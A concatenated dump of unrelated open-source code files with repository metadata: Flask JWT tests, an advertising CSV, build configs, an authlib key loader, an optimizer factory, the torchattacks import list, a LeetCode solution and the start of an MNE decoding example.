def test_current_rolenames(self, user_class, db, default_guard):
"""
This test verifies that the rolenames attached to the current user
can be extracted from the jwt token data that has been added to the
current flask app's context
"""
jwt_data = {}
add_jwt_data_to_app_context(jwt_data)
assert current_rolenames() == set([
'non-empty-but-definitely-not-matching-subset'
])
jwt_data = {'rls': 'admin,operator'}
add_jwt_data_to_app_context(jwt_data)
assert current_rolenames() == set(['admin', 'operator'])
def test_current_custom_claims(self, user_class, db, default_guard):
"""
This test verifies that any custom claims attached to the current jwt
can be extracted from the jwt token data that has been added to the
current flask app's context
"""
jwt_data = dict(
id=13,
jti='whatever',
duder='brief',
el_duderino='not brief',
)
add_jwt_data_to_app_context(jwt_data)
assert current_custom_claims() == dict(
duder='brief',
el_duderino='not brief',
)
def test_duration_from_string_success(self):
"""
This test verifies that the duration_from_string method can be used to
parse a duration from a string with expected formats
"""
expected_duration = pendulum.duration(days=12, hours=1, seconds=1)
computed_duration = duration_from_string('12d1h1s')
assert computed_duration == expected_duration
expected_duration = pendulum.duration(months=1, hours=2, minutes=3)
computed_duration = duration_from_string('1 Month 2 Hours 3 minutes')
assert computed_duration == expected_duration
expected_duration = pendulum.duration(days=1, minutes=2, seconds=3)
computed_duration = duration_from_string('1day,2min,3sec')
assert computed_duration == expected_duration
expected_duration = pendulum.duration(months=1, minutes=2)
computed_duration = duration_from_string('1mo,2m')
assert computed_duration == expected_duration
def test_duration_from_string_fails(self):
"""
This test verifies that the duration_from_string method raises a
ConfiguationError exception if there was a problem parsing the string
"""
with pytest.raises(ConfigurationError):
duration_from_string('12x1y1z')
with pytest.raises(ConfigurationError):
duration_from_string('')
|
4c5cef02d9e84333d228702a1aa63f096ad88906
|
9d7506d03e4f07293143b2ee73a77c5b9ae0fc5a
|
/MachineLearning/LinearRegression/Application/Advertising.csv
|
1d7bf8eaeec1a9aa1bddd8e64d9408b543012bc9
|
[
"MIT"
] |
permissive
|
excelsimon/AI
|
52aa72157b5a548744539fbacd0cb60994ccf556
|
a54da940a1b47eb7d6fd921052932345eb12aeb2
|
refs/heads/master
| 2023-06-21T13:20:17.265234
| 2021-08-05T05:19:17
| 2021-08-05T05:19:17
| 103,625,033
| 130
| 40
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,756
|
csv
|
Advertising.csv
|
,TV,Radio,Newspaper,Sales
1,230.1,37.8,69.2,22.1
2,44.5,39.3,45.1,10.4
3,17.2,45.9,69.3,9.3
4,151.5,41.3,58.5,18.5
5,180.8,10.8,58.4,12.9
6,8.7,48.9,75,7.2
7,57.5,32.8,23.5,11.8
8,120.2,19.6,11.6,13.2
9,8.6,2.1,1,4.8
10,199.8,2.6,21.2,10.6
11,66.1,5.8,24.2,8.6
12,214.7,24,4,17.4
13,23.8,35.1,65.9,9.2
14,97.5,7.6,7.2,9.7
15,204.1,32.9,46,19
16,195.4,47.7,52.9,22.4
17,67.8,36.6,114,12.5
18,281.4,39.6,55.8,24.4
19,69.2,20.5,18.3,11.3
20,147.3,23.9,19.1,14.6
21,218.4,27.7,53.4,18
22,237.4,5.1,23.5,12.5
23,13.2,15.9,49.6,5.6
24,228.3,16.9,26.2,15.5
25,62.3,12.6,18.3,9.7
26,262.9,3.5,19.5,12
27,142.9,29.3,12.6,15
28,240.1,16.7,22.9,15.9
29,248.8,27.1,22.9,18.9
30,70.6,16,40.8,10.5
31,292.9,28.3,43.2,21.4
32,112.9,17.4,38.6,11.9
33,97.2,1.5,30,9.6
34,265.6,20,0.3,17.4
35,95.7,1.4,7.4,9.5
36,290.7,4.1,8.5,12.8
37,266.9,43.8,5,25.4
38,74.7,49.4,45.7,14.7
39,43.1,26.7,35.1,10.1
40,228,37.7,32,21.5
41,202.5,22.3,31.6,16.6
42,177,33.4,38.7,17.1
43,293.6,27.7,1.8,20.7
44,206.9,8.4,26.4,12.9
45,25.1,25.7,43.3,8.5
46,175.1,22.5,31.5,14.9
47,89.7,9.9,35.7,10.6
48,239.9,41.5,18.5,23.2
49,227.2,15.8,49.9,14.8
50,66.9,11.7,36.8,9.7
51,199.8,3.1,34.6,11.4
52,100.4,9.6,3.6,10.7
53,216.4,41.7,39.6,22.6
54,182.6,46.2,58.7,21.2
55,262.7,28.8,15.9,20.2
56,198.9,49.4,60,23.7
57,7.3,28.1,41.4,5.5
58,136.2,19.2,16.6,13.2
59,210.8,49.6,37.7,23.8
60,210.7,29.5,9.3,18.4
61,53.5,2,21.4,8.1
62,261.3,42.7,54.7,24.2
63,239.3,15.5,27.3,15.7
64,102.7,29.6,8.4,14
65,131.1,42.8,28.9,18
66,69,9.3,0.9,9.3
67,31.5,24.6,2.2,9.5
68,139.3,14.5,10.2,13.4
69,237.4,27.5,11,18.9
70,216.8,43.9,27.2,22.3
71,199.1,30.6,38.7,18.3
72,109.8,14.3,31.7,12.4
73,26.8,33,19.3,8.8
74,129.4,5.7,31.3,11
75,213.4,24.6,13.1,17
76,16.9,43.7,89.4,8.7
77,27.5,1.6,20.7,6.9
78,120.5,28.5,14.2,14.2
79,5.4,29.9,9.4,5.3
80,116,7.7,23.1,11
81,76.4,26.7,22.3,11.8
82,239.8,4.1,36.9,12.3
83,75.3,20.3,32.5,11.3
84,68.4,44.5,35.6,13.6
85,213.5,43,33.8,21.7
86,193.2,18.4,65.7,15.2
87,76.3,27.5,16,12
88,110.7,40.6,63.2,16
89,88.3,25.5,73.4,12.9
90,109.8,47.8,51.4,16.7
91,134.3,4.9,9.3,11.2
92,28.6,1.5,33,7.3
93,217.7,33.5,59,19.4
94,250.9,36.5,72.3,22.2
95,107.4,14,10.9,11.5
96,163.3,31.6,52.9,16.9
97,197.6,3.5,5.9,11.7
98,184.9,21,22,15.5
99,289.7,42.3,51.2,25.4
100,135.2,41.7,45.9,17.2
101,222.4,4.3,49.8,11.7
102,296.4,36.3,100.9,23.8
103,280.2,10.1,21.4,14.8
104,187.9,17.2,17.9,14.7
105,238.2,34.3,5.3,20.7
106,137.9,46.4,59,19.2
107,25,11,29.7,7.2
108,90.4,0.3,23.2,8.7
109,13.1,0.4,25.6,5.3
110,255.4,26.9,5.5,19.8
111,225.8,8.2,56.5,13.4
112,241.7,38,23.2,21.8
113,175.7,15.4,2.4,14.1
114,209.6,20.6,10.7,15.9
115,78.2,46.8,34.5,14.6
116,75.1,35,52.7,12.6
117,139.2,14.3,25.6,12.2
118,76.4,0.8,14.8,9.4
119,125.7,36.9,79.2,15.9
120,19.4,16,22.3,6.6
121,141.3,26.8,46.2,15.5
122,18.8,21.7,50.4,7
123,224,2.4,15.6,11.6
124,123.1,34.6,12.4,15.2
125,229.5,32.3,74.2,19.7
126,87.2,11.8,25.9,10.6
127,7.8,38.9,50.6,6.6
128,80.2,0,9.2,8.8
129,220.3,49,3.2,24.7
130,59.6,12,43.1,9.7
131,0.7,39.6,8.7,1.6
132,265.2,2.9,43,12.7
133,8.4,27.2,2.1,5.7
134,219.8,33.5,45.1,19.6
135,36.9,38.6,65.6,10.8
136,48.3,47,8.5,11.6
137,25.6,39,9.3,9.5
138,273.7,28.9,59.7,20.8
139,43,25.9,20.5,9.6
140,184.9,43.9,1.7,20.7
141,73.4,17,12.9,10.9
142,193.7,35.4,75.6,19.2
143,220.5,33.2,37.9,20.1
144,104.6,5.7,34.4,10.4
145,96.2,14.8,38.9,11.4
146,140.3,1.9,9,10.3
147,240.1,7.3,8.7,13.2
148,243.2,49,44.3,25.4
149,38,40.3,11.9,10.9
150,44.7,25.8,20.6,10.1
151,280.7,13.9,37,16.1
152,121,8.4,48.7,11.6
153,197.6,23.3,14.2,16.6
154,171.3,39.7,37.7,19
155,187.8,21.1,9.5,15.6
156,4.1,11.6,5.7,3.2
157,93.9,43.5,50.5,15.3
158,149.8,1.3,24.3,10.1
159,11.7,36.9,45.2,7.3
160,131.7,18.4,34.6,12.9
161,172.5,18.1,30.7,14.4
162,85.7,35.8,49.3,13.3
163,188.4,18.1,25.6,14.9
164,163.5,36.8,7.4,18
165,117.2,14.7,5.4,11.9
166,234.5,3.4,84.8,11.9
167,17.9,37.6,21.6,8
168,206.8,5.2,19.4,12.2
169,215.4,23.6,57.6,17.1
170,284.3,10.6,6.4,15
171,50,11.6,18.4,8.4
172,164.5,20.9,47.4,14.5
173,19.6,20.1,17,7.6
174,168.4,7.1,12.8,11.7
175,222.4,3.4,13.1,11.5
176,276.9,48.9,41.8,27
177,248.4,30.2,20.3,20.2
178,170.2,7.8,35.2,11.7
179,276.7,2.3,23.7,11.8
180,165.6,10,17.6,12.6
181,156.6,2.6,8.3,10.5
182,218.5,5.4,27.4,12.2
183,56.2,5.7,29.7,8.7
184,287.6,43,71.8,26.2
185,253.8,21.3,30,17.6
186,205,45.1,19.6,22.6
187,139.5,2.1,26.6,10.3
188,191.1,28.7,18.2,17.3
189,286,13.9,3.7,15.9
190,18.7,12.1,23.4,6.7
191,39.5,41.1,5.8,10.8
192,75.5,10.8,6,9.9
193,17.2,4.1,31.6,5.9
194,166.8,42,3.6,19.6
195,149.7,35.6,6,17.3
196,38.2,3.7,13.8,7.6
197,94.2,4.9,8.1,9.7
198,177,9.3,6.4,12.8
199,283.6,42,66.2,25.5
200,232.1,8.6,8.7,13.4
|
4acc70d943e1d1d3554b9d872b6f93ab6b8f1398
|
c882c16e1c42974f2744a79738bde155acc985b6
|
/runtests.py
|
3baf7e6fd799481e5172f14436e0eba109dcf328
|
[
"MIT"
] |
permissive
|
nitely/Spirit
|
4e4f1615a990ec8174f71ab66c64de5c4e599107
|
9a304a57de021108d9225b87f35ad6395d5d56d3
|
refs/heads/master
| 2023-06-09T02:09:47.275554
| 2023-05-24T09:19:48
| 2023-05-24T09:19:48
| 19,626,318
| 1,049
| 391
|
MIT
| 2023-08-20T05:34:25
| 2014-05-09T21:31:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,048
|
py
|
runtests.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import sys
import logging
import django
from django.test.runner import DiscoverRunner
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.project.settings.test'
def setup_celery():
try:
from celery import Celery
except ImportError:
return
app = Celery('test')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
def log_warnings():
logger = logging.getLogger('py.warnings')
handler = logging.StreamHandler()
logger.addHandler(handler)
def run_tests(reverse=False):
sys.stdout.write(
"\nRunning spirit test suite, using settings %(settings)r\n\n" %
{"settings": os.environ['DJANGO_SETTINGS_MODULE']})
return DiscoverRunner(reverse=reverse).run_tests([])
def start():
django.setup()
log_warnings()
setup_celery()
if run_tests() or run_tests(reverse=True):
sys.exit(1)
if __name__ == "__main__":
start()
|
5aae8b9431b96ee03a93d8000437de88d74f02a4
|
a2b3987eb8a50bee311f869e39d1c76e738ba2b8
|
/authlib/jose/rfc7517/jwk.py
|
b1578c49c5afecc54adc35e98293179530b0cf0a
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
lepture/authlib
|
abb3e14b8ccacef9ade90b28efed827ab65aadce
|
1846d6ac66e89bdb3268fffe15b7e49289966366
|
refs/heads/master
| 2023-09-04T04:27:56.650738
| 2023-09-02T07:42:47
| 2023-09-02T07:42:47
| 108,510,280
| 4,091
| 481
|
BSD-3-Clause
| 2023-09-13T13:04:38
| 2017-10-27T06:52:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,042
|
py
|
jwk.py
|
from authlib.common.encoding import json_loads
from .key_set import KeySet
from ._cryptography_key import load_pem_key
class JsonWebKey:
JWK_KEY_CLS = {}
@classmethod
def generate_key(cls, kty, crv_or_size, options=None, is_private=False):
"""Generate a Key with the given key type, curve name or bit size.
:param kty: string of ``oct``, ``RSA``, ``EC``, ``OKP``
:param crv_or_size: curve name or bit size
:param options: a dict of other options for Key
:param is_private: create a private key or public key
:return: Key instance
"""
key_cls = cls.JWK_KEY_CLS[kty]
return key_cls.generate_key(crv_or_size, options, is_private)
@classmethod
def import_key(cls, raw, options=None):
"""Import a Key from bytes, string, PEM or dict.
:return: Key instance
"""
kty = None
if options is not None:
kty = options.get('kty')
if kty is None and isinstance(raw, dict):
kty = raw.get('kty')
if kty is None:
raw_key = load_pem_key(raw)
for _kty in cls.JWK_KEY_CLS:
key_cls = cls.JWK_KEY_CLS[_kty]
if key_cls.validate_raw_key(raw_key):
return key_cls.import_key(raw_key, options)
key_cls = cls.JWK_KEY_CLS[kty]
return key_cls.import_key(raw, options)
@classmethod
def import_key_set(cls, raw):
"""Import KeySet from string, dict or a list of keys.
:return: KeySet instance
"""
raw = _transform_raw_key(raw)
if isinstance(raw, dict) and 'keys' in raw:
keys = raw.get('keys')
return KeySet([cls.import_key(k) for k in keys])
raise ValueError('Invalid key set format')
def _transform_raw_key(raw):
if isinstance(raw, str) and \
raw.startswith('{') and raw.endswith('}'):
return json_loads(raw)
elif isinstance(raw, (tuple, list)):
return {'keys': raw}
return raw
|
14e265690c6653d6f5604c43a4dde0d8f283a536
|
09b542643e43d4e31035faf014fbd61b766587e0
|
/midi-script/DeviceParameter.py
|
4cff410bb00c9a512de5c2a51768c9f04d6848be
|
[
"MIT"
] |
permissive
|
leolabs/ableton-js
|
964f8077d4f25933045b50bc5f95934cc337d747
|
d239edf91a3c46a9444a6d5a533be66936452527
|
refs/heads/master
| 2023-08-03T21:46:31.449486
| 2023-07-27T12:02:26
| 2023-07-27T12:02:26
| 187,489,144
| 259
| 34
|
MIT
| 2023-07-22T10:22:36
| 2019-05-19T14:44:42
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 566
|
py
|
DeviceParameter.py
|
from __future__ import absolute_import
from .Interface import Interface
class DeviceParameter(Interface):
@staticmethod
def serialize_device_parameter(param):
if param is None:
return None
device_parameter_id = Interface.save_obj(param)
return {
"id": device_parameter_id,
"name": param.name,
"value": param.value,
"is_quantized": param.is_quantized
}
def __init__(self, c_instance, socket):
super(DeviceParameter, self).__init__(c_instance, socket)
|
ad775752ffc1196a21cf5b9843fb4013e9f394b1
|
acad69f0abe162eea0cb13cbe15bfd88f6da08b4
|
/optim/__init__.py
|
7dab15c8832dbb471480bd7e77bd6db9fdda52f2
|
[] |
no_license
|
zhangzjn/EMO
|
69afcac53800d8b9a390f1214e178e2ca4da3b24
|
141afbdbce04683790f0699f256327ec420be442
|
refs/heads/main
| 2023-08-27T19:04:23.313676
| 2023-08-15T04:09:55
| 2023-08-15T04:09:55
| 584,987,542
| 139
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,309
|
py
|
__init__.py
|
import torch
from torch import optim as optim
from timm.optim.adafactor import Adafactor
from timm.optim.adahessian import Adahessian
from timm.optim.adamp import AdamP
from timm.optim.nadam import Nadam
from timm.optim.radam import RAdam
from timm.optim.rmsprop_tf import RMSpropTF
from timm.optim.sgdp import SGDP
from timm.optim.lookahead import Lookahead
def check_keywords_in_name(name, keywords=()):
isin = False
for keyword in keywords:
if keyword in name:
isin = True
return isin
def add_weight_decay(model, weight_decay=1e-5, skip_list=(), skip_keywords=()):
decay = []
no_decay = []
for name, param in model.named_parameters():
if not param.requires_grad:
continue # frozen weights
if len(param.shape) == 1 or name.endswith(".bias") or (name in skip_list) or check_keywords_in_name(name, skip_keywords):
no_decay.append(param)
else:
decay.append(param)
return [
{'params': no_decay, 'weight_decay': 0.},
{'params': decay, 'weight_decay': weight_decay}]
def get_optim(cfg, net, lr, betas=None, filter_bias_and_bn=True):
optim_kwargs = {k: v for k, v in cfg.optim.optim_kwargs.items()}
optim_split = optim_kwargs.pop('name').lower().split('_')
optim_name = optim_split[-1]
optim_lookahead = optim_split[0] if len(optim_split) == 2 else None
if optim_kwargs.get('weight_decay', None) and filter_bias_and_bn:
skip = {}
skip_keywords = {}
if hasattr(net, 'no_weight_decay'):
skip = net.no_weight_decay()
if hasattr(net, 'no_weight_decay_keywords'):
skip_keywords = net.no_weight_decay_keywords()
params = add_weight_decay(net, optim_kwargs['weight_decay'], skip, skip_keywords)
optim_kwargs['weight_decay'] = 0.
else:
params = net.parameters()
if optim_kwargs.get('betas', None) and betas:
optim_kwargs['betas'] = betas
optim_terms = {
'sgd': optim.SGD,
'adam': optim.Adam,
'adamw': optim.AdamW,
'adadelta': optim.Adadelta,
'rmsprop': optim.RMSprop,
'nadam': Nadam,
'radam': RAdam,
'adamp': AdamP,
'sgdp': SGDP,
'adafactor': Adafactor,
'adahessian': Adahessian,
'rmsproptf': RMSpropTF,
}
optimizer = optim_terms[optim_name](params, lr=lr, **optim_kwargs)
if optim_lookahead:
optimizer = Lookahead(optimizer)
return optimizer
|
7e5be0f5f8ee1fcc540ceb6ebc3e5fd946837a36
|
676acab8ff535019faff7da3afb8eecc3fa127f5
|
/target/pixhawk/fmt-io/project/rtconfig.py
|
86aee4c77b9f5d7397068d8df8dbc9d9cefcf8a8
|
[
"Apache-2.0"
] |
permissive
|
Firmament-Autopilot/FMT-Firmware
|
f8c324577245bd7e91af436954b4ce9421acbb41
|
0212fe89820376bfbedaded519552f6b011a7b8a
|
refs/heads/master
| 2023-09-01T11:37:46.194145
| 2023-08-29T06:33:10
| 2023-08-29T06:33:10
| 402,557,689
| 351
| 143
|
Apache-2.0
| 2023-09-12T05:28:39
| 2021-09-02T20:42:56
|
C
|
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
rtconfig.py
|
import os
# toolchains options
ARCH='arm'
CPU='cortex-m3'
CROSS_TOOL='gcc'
# build version: debug or release
BUILD = 'release'
#device options
STM32_TYPE = 'STM32F10X_MD'
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = 'your-compiler-path'
else:
print('================ERROR============================')
print('Not support %s yet!' % CROSS_TOOL)
print('=================================================')
exit(0)
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'arm-none-eabi-'
CC = PREFIX + 'gcc'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'axf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu=cortex-m3 -mthumb -ffunction-sections -fdata-sections'
CFLAGS = DEVICE + ' --specs=nano.specs -DUSE_STDPERIPH_DRIVER -DSTM32F10X_MD -Dgcc'
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
LFLAGS = DEVICE + ' -nostartfiles --specs=nano.specs -Wl,-no-wchar-size-warning,--gc-sections,-Map=build/fmt_io.map,-cref,-u,Reset_Handler -T stm32_rom.ld'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
POST_ACTION = OBJCPY + ' -O binary $TARGET build/fmt_io.bin\n' + SIZE + ' $TARGET \n'
|
fbf584b5dea7f12bb44bd5068540eb698ec2b777
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/shared/utils/requesters/game_restrictions_requester.py
|
774b15d4ca56338fde4dd8e08ee2ea9db7f3925e
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 958
|
py
|
game_restrictions_requester.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/shared/utils/requesters/game_restrictions_requester.py
import typing
import BigWorld
from adisp import async
from gui.shared.utils.requesters.abstract import AbstractSyncDataRequester
from skeletons.gui.shared.utils.requesters import IGameRestrictionsRequester
class GameRestrictionsRequester(AbstractSyncDataRequester, IGameRestrictionsRequester):
@property
def session(self):
return self.getCacheValue('session', {})
@property
def hasSessionLimit(self):
return len(self.session) > 0
def getKickAt(self):
return self.getCacheValue('session', {}).get('kick_at', 0)
@property
def settings(self):
return self.getCacheValue('settings', {})
@async
def _requestCache(self, callback):
BigWorld.player().gameRestrictions.getCache(lambda resID, value: self._response(resID, value, callback))
|
0297d2474c401c76e75d034ec7d30b43a9312913
|
f740d8dbaaf74688278c9df3badd3d6acc2a2761
|
/torchattacks/__init__.py
|
4f1fd2d7fecff9be787dbd31f29c78569e216ded
|
[
"MIT"
] |
permissive
|
Harry24k/adversarial-attacks-pytorch
|
4a52f47a79bbe88cd91e5ea76c3fc8d40e2cc1e5
|
3c8e03fdf6688bfa4e4ebfc6a63762df0ad258b0
|
refs/heads/master
| 2023-09-05T10:58:57.135718
| 2023-07-03T08:47:17
| 2023-07-03T08:47:17
| 182,017,442
| 1,420
| 312
|
MIT
| 2023-07-24T09:08:14
| 2019-04-18T04:43:39
|
Python
|
UTF-8
|
Python
| false
| false
| 1,957
|
py
|
__init__.py
|
# None attacks
from .attacks.vanila import VANILA
from .attacks.gn import GN
# Linf attacks
from .attacks.fgsm import FGSM
from .attacks.bim import BIM
from .attacks.rfgsm import RFGSM
from .attacks.pgd import PGD
from .attacks.eotpgd import EOTPGD
from .attacks.ffgsm import FFGSM
from .attacks.tpgd import TPGD
from .attacks.mifgsm import MIFGSM
from .attacks.upgd import UPGD
from .attacks.apgd import APGD
from .attacks.apgdt import APGDT
from .attacks.difgsm import DIFGSM
from .attacks.tifgsm import TIFGSM
from .attacks.jitter import Jitter
from .attacks.nifgsm import NIFGSM
from .attacks.pgdrs import PGDRS
from .attacks.sinifgsm import SINIFGSM
from .attacks.vmifgsm import VMIFGSM
from .attacks.vnifgsm import VNIFGSM
from .attacks.spsa import SPSA
from.attacks.pifgsm import PIFGSM
from.attacks.pifgsmplusplus import PIFGSMPLUSPLUS
# L2 attacks
from .attacks.cw import CW
from .attacks.pgdl2 import PGDL2
from .attacks.pgdrsl2 import PGDRSL2
from .attacks.deepfool import DeepFool
from .attacks.eaden import EADEN
# L1 attacks
from .attacks.eadl1 import EADL1
# L0 attacks
from .attacks.sparsefool import SparseFool
from .attacks.onepixel import OnePixel
from .attacks.pixle import Pixle
from .attacks.jsma import JSMA
# Linf, L2 attacks
from .attacks.fab import FAB
from .attacks.autoattack import AutoAttack
from .attacks.square import Square
# Wrapper Class
from .wrappers.multiattack import MultiAttack
from .wrappers.lgv import LGV
__version__ = '3.4.1'
__all__ = [
"VANILA", "GN",
"FGSM", "BIM", "RFGSM", "PGD", "EOTPGD", "FFGSM",
"TPGD", "MIFGSM", "UPGD", "APGD", "APGDT", "DIFGSM",
"TIFGSM", "Jitter", "NIFGSM", "PGDRS", "SINIFGSM",
"VMIFGSM", "VNIFGSM", "SPSA", "JSMA", "EADL1", "EADEN", "PIFGSM", "PIFGSMPLUSPLUS",
"CW", "PGDL2", "DeepFool", "PGDRSL2",
"SparseFool", "OnePixel", "Pixle",
"FAB", "AutoAttack", "Square",
"MultiAttack", "LGV",
]
__wrapper__ = [
"LGV", "MultiAttack",
]
|
639db2146c52a20a519cf762067be50f313a1749
|
af666c914f3878793ec76e20f71fa3ff992fa181
|
/Test/astc_image_sweep.py
|
575a75a21b31476fe51c7b29bde7e3ea04293fd8
|
[
"Apache-2.0"
] |
permissive
|
ARM-software/astc-encoder
|
d0cce03f91571ee96edb75ec7a9fe20538ba5ff5
|
3a2cda16c8bc20efa0dbda907447136ccfb88d7f
|
refs/heads/main
| 2023-09-04T23:31:54.734837
| 2023-09-03T17:18:36
| 2023-09-03T17:19:05
| 34,799,882
| 887
| 233
|
Apache-2.0
| 2023-09-03T12:43:16
| 2015-04-29T14:51:23
|
C
|
UTF-8
|
Python
| false
| false
| 2,739
|
py
|
astc_image_sweep.py
|
#!/usr/bin/env python3
# SPDX-License-Identifier: Apache-2.0
# -----------------------------------------------------------------------------
# Copyright 2021-2022 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# -----------------------------------------------------------------------------
"""
A benchmarking sweep helper, which can generate a performance-vs-quality sweep
for a single input images. Like other test functionality, this uses structured
image directory layouts for determining image settings to pass to the codec.
"""
import argparse
import os
import platform
import sys
import testlib.encoder as te
import testlib.image as ti
def parse_command_line():
"""
Parse the command line.
Returns:
Namespace: The parsed command line container.
"""
parser = argparse.ArgumentParser()
# All reference encoders
parser.add_argument("--step", dest="step", default="10", type=int, help="step size")
parser.add_argument("--repeats", dest="repeats", type=int, default=1, help="repeats")
parser.add_argument(dest="image", default=None,
help="select the test image to run")
args = parser.parse_args()
return args
def main():
"""
The main function.
Returns:
int: The process return code.
"""
# Parse command lines
args = parse_command_line()
blockSizes = ["4x4", "5x5", "6x6", "8x8", "10x10"]
repeats = max(args.repeats, 1)
step = max(args.step, 1)
image = ti.TestImage(args.image)
codec = te.Encoder2x("avx2")
print("Block Size, Quality, PSNR (dB), Coding Time (s), Coding Rate (MT/s)")
for blockSize in blockSizes:
for quality in range(0, 101, args.step):
localRepeats = repeats
if quality < 20:
localRepeats = localRepeats * 2
if quality < 40:
localRepeats = localRepeats * 2
results = codec.run_test(image, blockSize, f"{quality}", localRepeats, False)
psnr = results[0]
codingTime = results[2]
mts = results[3]
print(f"{blockSize}, {quality}, {psnr}, {codingTime}, {mts}")
return 0
if __name__ == "__main__":
sys.exit(main())
|
9c27fcf78c66ccd21e8a632767e44ec044d9e2aa
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/find-the-closest-palindrome.py
|
a004106d3469519a5e9a504e4b0575bc0d30719c
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 495
|
py
|
find-the-closest-palindrome.py
|
# Time: O(l)
# Space: O(l)
class Solution(object):
def nearestPalindromic(self, n):
"""
:type n: str
:rtype: str
"""
l = len(n)
candidates = set((str(10**l + 1), str(10**(l - 1) - 1)))
prefix = int(n[:(l + 1)/2])
for i in map(str, (prefix-1, prefix, prefix+1)):
candidates.add(i + [i, i[:-1]][l%2][::-1])
candidates.discard(n)
return min(candidates, key=lambda x: (abs(int(x) - int(n)), int(x)))
|
ca52657dbabca7860b7c9364bfc663f668c141c3
|
9ed3b16b3da72e4c47a04f2f2e3ef395e9fd9f20
|
/contrib/libexttextcat/template.py
|
9a907353a19310a4d73bae2242ae826eba142ab8
|
[
"BSD-2-Clause"
] |
permissive
|
chimera-linux/cports
|
fdae59dc25856942be3041e10e3533dbf8f883c3
|
714680161cd719dd047452c95fbb9b447bc23a86
|
refs/heads/master
| 2023-09-03T19:30:40.720670
| 2023-09-03T15:07:40
| 2023-09-03T15:07:40
| 374,000,317
| 118
| 37
|
BSD-2-Clause
| 2023-09-14T20:31:08
| 2021-06-05T02:07:34
|
Python
|
UTF-8
|
Python
| false
| false
| 810
|
py
|
template.py
|
pkgname = "libexttextcat"
pkgver = "3.4.6"
pkgrel = 0
build_style = "gnu_configure"
configure_args = ["--disable-werror"]
make_cmd = "gmake"
hostmakedepends = ["pkgconf", "gmake", "automake", "libtool"]
checkdepends = ["bash"]
pkgdesc = "N-Gram-Based Text Categorization library"
maintainer = "q66 <q66@chimera-linux.org>"
license = "BSD-3-Clause"
url = "https://wiki.documentfoundation.org/Libexttextcat"
source = (
f"https://dev-www.libreoffice.org/src/{pkgname}/{pkgname}-{pkgver}.tar.xz"
)
sha256 = "6d77eace20e9ea106c1330e268ede70c9a4a89744ddc25715682754eca3368df"
def post_install(self):
self.install_license("LICENSE")
@subpackage("libexttextcat-progs")
def _progs(self):
return self.default_progs()
@subpackage("libexttextcat-devel")
def _devel(self):
return self.default_devel()
|
41d26d68360d1d712289172ae72fa9f26b37128f
|
e7bf1ff05319acc59bba5af5890041bd82c3e197
|
/examples/decoding/linear_model_patterns.py
|
1786df4a4b8c9a15bbf85b9f2340189a0ab0b403
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mne-tools/mne-python
|
7e8d7e945dfbbee6432a4955cf050fa823f2d34b
|
f44636f00666b8eb869417960926d01690ff4f42
|
refs/heads/main
| 2023-09-04T03:05:37.402100
| 2023-09-03T14:15:18
| 2023-09-03T14:15:18
| 1,301,584
| 2,437
| 1,418
|
BSD-3-Clause
| 2023-09-14T19:23:38
| 2011-01-28T03:31:13
|
Python
|
UTF-8
|
Python
| false
| false
| 4,035
|
py
|
linear_model_patterns.py
|
"""
.. _ex-linear-patterns:
===============================================================
Linear classifier on sensor data with plot patterns and filters
===============================================================
Here decoding, a.k.a MVPA or supervised machine learning, is applied to M/EEG
data in sensor space. Fit a linear classifier with the LinearModel object
providing topographical patterns which are more neurophysiologically
interpretable :footcite:`HaufeEtAl2014` than the classifier filters (weight
